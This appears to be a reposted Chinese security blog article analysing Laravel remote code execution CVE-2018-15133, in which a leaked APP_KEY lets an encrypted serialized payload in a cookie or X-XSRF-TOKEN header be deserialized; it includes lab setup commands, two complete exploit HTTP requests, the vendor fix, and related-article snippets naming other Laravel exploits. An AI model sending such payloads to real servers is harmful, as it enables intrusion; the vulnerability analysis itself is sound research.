php laravel框架 rce分析 cve-2018-15133

最新推荐文章于 2024-07-17 10:08:47 发布
最新推荐文章于 2024-07-17 10:08:47 发布
阅读量1.8k 收藏 1
点赞数
原文链接:https://xz.aliyun.com/t/6533
版权

本文将记录在 APP_KEY 泄露情况下的 Laravel RCE 漏洞。该漏洞可以分别在两个地方触发,一个是直接添加在 cookie 字段,例如: Cookie: ATTACK=payload ;另一处是在 HTTP Header 处添加 X-XSRF-TOKEN 字段,例如: X-XSRF-TOKEN: payload 。漏洞影响版本:5.5.x<=5.5.40、5.6.x<=5.6.29。

环境搭建

这里我的测试环境为 Debian9+apache+PHP7.2+Laravel5.6.29 。

➜  html composer create-project laravel/laravel laravel5629 --prefer-dist "5.6.0"
➜  html cd laravel5629
➜  laravel5629 sed -i -e 's/5.6.\*/5.6.29/g' composer.json
➜  laravel5629 composer update
➜  laravel5629 ./artisan key:generate
➜  laravel5629 echo "Route::post('/', function() {return view('welcome');});" >> ./routes/web.php
➜  laravel5629 ./artisan serve --host=0.0.0.0

漏洞分析

当接收到 POST 数据时,程序在获取 Illuminate\Http\Response 类对象时,会依次调用如下 10个类 的 handle 方法。

App\Http\Middleware\TrustProxies
App\Http\Middleware\CheckForMaintenanceMode
Illuminate\Foundation\Http\Middleware\ValidatePostSize
App\Http\Middleware\TrimStrings
Illuminate\Foundation\Http\Middleware\ConvertEmptyStringsToNull
App\Http\Middleware\EncryptCookies
Illuminate\Cookie\Middleware\AddQueuedCookiesToResponse
Illuminate\Session\Middleware\StartSession
Illuminate\View\Middleware\ShareErrorsFromSession
App\Http\Middleware\VerifyCsrfToken

而在 App\Http\Middleware\EncryptCookies 和 App\Http\Middleware\VerifyCsrfToken 两个类的 handle 方法中,存在对请求值的合法性校验,并对通过校验的值进行反序列化操作。攻击者可以利用网站泄露的 APP_KEY ,结合公开的 Laravel 反序列化 POP 链进行 RCE 。下面,我们来分别看下这两个类的具体代码。

通过Cookie触发RCE

通过 Cookie 触发 RCE 的 EXP 如下(这里payload中执行的命令是 curl 127.0.0.1:8888 ):

POST / HTTP/1.1
Host: 0.0.0.0:8000
Cookie: XDEBUG_SESSION=PHPSTORM; ATTACK=eyJpdiI6ImRhSTdpRkhWTFowVHNtNDMyZW5wWlE9PSIsInZhbHVlIjoiRHRRRXpRNUhkeG8rQ0s0a21qRmpzUHNkZ0lBaFpsVjlvYk1uZmtwOVpRVFZsdmNKSUhMQnJ0UlBWeHhrbElZb0ZaRnRmMjFlbTNSNXRXZGxCeEF2clNvbk5HT2FDZEEwSGVKU2VuUkFSeVhXTUEwVzFUYlRlc2RsWk1scEg3eWRUKzljRHBWQmEzMERRR0gydG4zYURzWEFcL2djUmFDVGJ5M2NMREVvMDhmeEE0dm5FTVJcL3UwZHBsUjhxajBHbFVBaHVRTWRzN3QwNU9XdWdISWZPaklkXC80alpKQjZEMlJTQjdVXC8wZ3BoNXVXWVFRK1NUSVM5OVhkSXRuSXpHZWRMcUJnR0RwVjlLeDNPUHMyNFpMbWJRPT0iLCJtYWMiOiIxM2M3YThiNmI4MWNkZmI1YjNhMGEzZDRjMDdkYTJiY2MyNzZhOWZkYzUwM2NiOTg1MGRiMTk0ZGU1MjhhOWE1In0=;
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

Laravel 框架在获取 Illuminate\Http\Response 类对象时,会循环对 Cookie 的值进行解密以验证其合法性。在解密的时候会用到 APP_KEY ,如果解密顺利,就会将解密后的值进行反序列化(如下图149行代码)。我们可以看到下图的调试信息中, $decrypted 变量已经反序列化成攻击者精心构造的类对象了。继续执行下去,就会触发 RCE 。

通过HTTP Header触发RCE

通过 HTTP Header 触发 RCE 的 EXP 如下(这里payload中执行的命令是 curl 127.0.0.1:8888 ):

POST / HTTP/1.1
Host: 0.0.0.0:8000
Cookie: XDEBUG_SESSION=PHPSTORM;
X-XSRF-TOKEN: eyJpdiI6ImRhSTdpRkhWTFowVHNtNDMyZW5wWlE9PSIsInZhbHVlIjoiRHRRRXpRNUhkeG8rQ0s0a21qRmpzUHNkZ0lBaFpsVjlvYk1uZmtwOVpRVFZsdmNKSUhMQnJ0UlBWeHhrbElZb0ZaRnRmMjFlbTNSNXRXZGxCeEF2clNvbk5HT2FDZEEwSGVKU2VuUkFSeVhXTUEwVzFUYlRlc2RsWk1scEg3eWRUKzljRHBWQmEzMERRR0gydG4zYURzWEFcL2djUmFDVGJ5M2NMREVvMDhmeEE0dm5FTVJcL3UwZHBsUjhxajBHbFVBaHVRTWRzN3QwNU9XdWdISWZPaklkXC80alpKQjZEMlJTQjdVXC8wZ3BoNXVXWVFRK1NUSVM5OVhkSXRuSXpHZWRMcUJnR0RwVjlLeDNPUHMyNFpMbWJRPT0iLCJtYWMiOiIxM2M3YThiNmI4MWNkZmI1YjNhMGEzZDRjMDdkYTJiY2MyNzZhOWZkYzUwM2NiOTg1MGRiMTk0ZGU1MjhhOWE1In0=;
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 0

Laravel 框架在获取 Illuminate\Http\Response 类对象时,还会获取 CSRF token 。如果没有获取到 CSRF token ,就会转而获取 X-XSRF-TOKEN ,并在校验通过后对其进行反序列化操作。其校验使用的解密代码和上面一致,都是通过 Illuminate\Encryption\Encrypter 类的 decrypt 方法完成的,这里就不在赘述。

EXP构造

现在我们看看如何构造 EXP ,其实加密函数也在 Illuminate\Encryption\Encrypter 类中,其具体代码在 encrypt 方法中。

我们只需要将其直接拿出来,稍加修改即可利用, EXP 脚本如下:

已删除

修复

最后,我们再来看一下官方的修复代码。如下图所示,在 Laravel5.6.30 的代码中,对于 Cookie 的解析,多传了一个 static::serialized() 值来禁止反序列化操作。同样,对于 X-XSRF-TOKEN 头的解析也是同样的处理,这里就不再贴代码了。

参考

CVE-2018-15133

Laravel5.6.30升级公告

Laravel Remote Code Execution when APP_KEY is leaked PoC (CVE-2018-15133)

 

 

whatday
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【漏洞复现】CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-03 1万+
文章目录前言一、漏洞简介二、影响范围三、环境搭建四、漏洞复现五、修复方法六、参考链接 前言 仅供安全研究和技术学习,切勿用于非法用途,切记! 一、漏洞简介 当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 二、影响范围 Laravel < 8.4.3 facade
Laravel Debug mode RCECVE-2021-3129)漏洞复现
m0_48520508的博客
02-19 1440
0x00简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 0x01漏洞概述 当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远
exploit_laravel_cve-2018-15133:利用 API_KEY 利用 Laravel 远程代码执行 (CVE-2018-15133)
05-31
针对 CVE-2018-15133Laravel 漏洞利用 此代码利用 ,它基于和对该漏洞。 我几乎只是为一个盒子做了这个,因为我现在不想使用 Metasploit,也不想作为练习 Python 的借口。 来自 CVE 的描述: 在 Laravel Framework 到 5.5.40 和 5.6.x 到 5.6.29 中,远程代码执行可能由于对潜在不可信 X-XSRF-TOKEN 值的反序列化调用而发生。 这涉及到 Illuminate/Encryption/Encrypter.php 中的解密方法和 phpggc 中 gadgetchains/Laravel/RCE/3/chain.php 中的 PendingBroadcast。 攻击者必须知道应用程序密钥,这通常不会发生,但如果攻击者之前拥有特权访问权限或成功完成之前的攻击,则可能会发生。 安装依赖: pip ins
探索 Laravel 安全边界:利用APP_KEY泄露的远程代码执行案例(CVE-2018-15133)
gitblog_00084的博客
05-26 345
探索 Laravel 安全边界:利用APP_KEY泄露的远程代码执行案例(CVE-2018-15133) 项目地址:https://gitcode.com/kozmic/laravel-poc-CVE-2018-15133 在安全与技术的交汇处,总有那么一些项目,揭示了潜在的风险,同时也教导我们如何守护数字世界的门槛。今天,我们将深入解析一个针对Laravel框架的安全研究实例——【Laravel...
laravel 信息泄露 (CVE-2017-16894)
最新发布
qq_23003811的博客
07-17 474
laravel框架的.env配置文件中,默认调试功能debug是开启的。在前台会返回报错详情、环境变量、服务器配置等敏感信息。1、burp抓包,修改请示方法为POST,提交1=2让程序报错。2、报错信息出现敏感信息。
Laravel RCECVE-2021-3129)复现
m0_64815693的博客
01-27 2399
CVE-2021-3129漏洞复现 Laravel Debug mode RCE
Laravel Debug mode 远程代码执行(CVE-2021-3129)
jammny
01-30 3395
漏洞详情 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 漏洞影响 Laravel <= 8.4.2 Ignition <= 2.5.1 漏洞利用 下载靶场:gi
Laravel反序列化实现RCE
p4nic的博客
08-28 661
Laravel反序列化实现RCE,版本5.1和7.30
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
**Laravel 框架中的 CVE-2021-3129 漏洞详解及 EXP 利用** Laravel 是一个流行的开源 PHP Web 应用框架,以其优雅的语法和强大的功能深受开发者喜爱。然而,就像任何其他软件一样,Laravel 也存在安全漏洞。其中之...
Hackthebox:academy Walkthrough(not use metasploit)
汗的博客
12-18 613
预备知识 越权、CVE-2018-15133(APP_KEY 泄露情况下的 Laravel RCE 漏洞)、目录爆破(递归)、敏感信息泄露 linPEAS、/var/log/audit等敏感信息泄露 信息收集和获取立足点 nmap基础扫描一下 详细收集信息,先丢在旁边,下面这个proxychains必须在sudo前,含义参见Nmap Cheat Sheet proxychains sudo nmap -p 1-65535 -sV -sS -T4 10.10.10.215 nmap开了80端口,所以先在后台
PHP框架Lavarel被发现存在高危漏洞
测试0901-1
01-31 969
1月31日,白帽汇安全研究院发现了一个非常流行的PHP框架Laravel,因其配置不当会泄露MySQL,Redis,Elastic,Mongodb,neo4j,postgresql,SQLServer,Oracle,Firebird,sqlite,mail账号密码和APP_KEY等敏感信息。 雷锋网(公众号:雷锋网)得知,相比其他的PHP框架Lara...
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 exploit.py http://pwnme.me:8000 /var/www/html/laravel/storage/logs/laravel.log ' uname -a ' 参考
CVE-2019-9081:laravel框架序列化RCE复现分析
bamanju0574的博客
09-10 655
这里贴上两篇大佬的分析的帖子 本人习惯把平常的一些笔记或者好的帖子记录在自己的博客当中,便于之后遇到同样的漏洞时快速打开思路 1.https://xz.aliyun.com/t/5510#toc-8 2.https://skysec.top/2019/07/22/CVE-2019-9081-Laravel-Deserialization-RCE-Vulnerability/#%E6...
Laravel Debug mode 远程代码执行漏洞(CVE-2021-3129 )
qq_73767109的博客
07-03 1116
Laravel < 8.4.3可以实现日志利用造成phar反序列化。
laravel 5.4 RCE分析(2条链)
E1even的博客
06-07 234
在此之前看过其他师傅的审计文章,看完之后想自己审计出几条链子 找到destruct函数: 跟进一下这几个参数: 首先是events: 发现events是可控的 event同样可控,再跟进一下dispatch函数 很多地方都定义了function dispatch 函数 再来看一下我们的入口点__destruct()函数:有两个思路:第一个是调用_call方法,看看能不能调用方法进行命令执行。第二个方法是再dispatch函数里面去寻找可以命令执行的函数 public function __dest
laravel 5.5 RCE分析(四条链)
E1even的博客
06-08 457
第一条链子(和5.4一样的链子) 依然是找到_destruct函数,这里我们依然先从54漏洞的位置来分析: 再寻找_call函数之前,先梳理一下我们通过_call方法的思路: 首先events变量是要去实例化一个类,而且这个类中不存在dispatch方法或者可以被我们RCERCE这种情况概率不大基本可以忽略,其次dispatch应该是一个可控的数组,我们通过这个可控的数组传入system命令,然后event就是我们的cmd 思路清楚了,再来开始审计把: 寻找_call方法: 同样还是找到了larave
laravel 58 RCE分析(一条链子)
E1even的博客
06-10 310
文章目录写在最前面和laravel55 一样的EXP寻找一个新的链子->dispatch:漏洞分析:继续分析:最终EXP:总结: 写在最前面 之前审计过laravel54 55的框架,这次继续跟着WP审计一下laravel58,这次链子相比于前面两个框架,相比来说更为复杂一点,因此再审计的过程,建议读者不断回溯代码,理解每个参数变量的来源,环境搭建这里不做讲解了,直接进行分析laravel55 一样的EXP 首先依然是寻找_construct方法:这里找的是 :Illuminate\Broadca
再谈Laravel Debug mode RCECVE-2021-3129)漏洞
wangluoanquan111的博客
08-10 3049
Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。2021年01月12日,Laravel被披露存在一个远程代码执行漏洞(CVE-2021-3129)。当Laravel开启了Debug模式时,由于Laravel自带的Ignition组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。
phpMyAdmin远程文件包含漏洞CVE-2018-12613深度分析
"phpmyadmin 远程文件包含漏洞(CVE-2018-12613)" 本文将详细解析PHPMyAdmin中的远程文件包含漏洞(CVE-2018-12613),这是一个严重影响该开源MySQL数据库管理工具安全性的漏洞。PHPMyAdmin是一个广受欢迎的Web...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值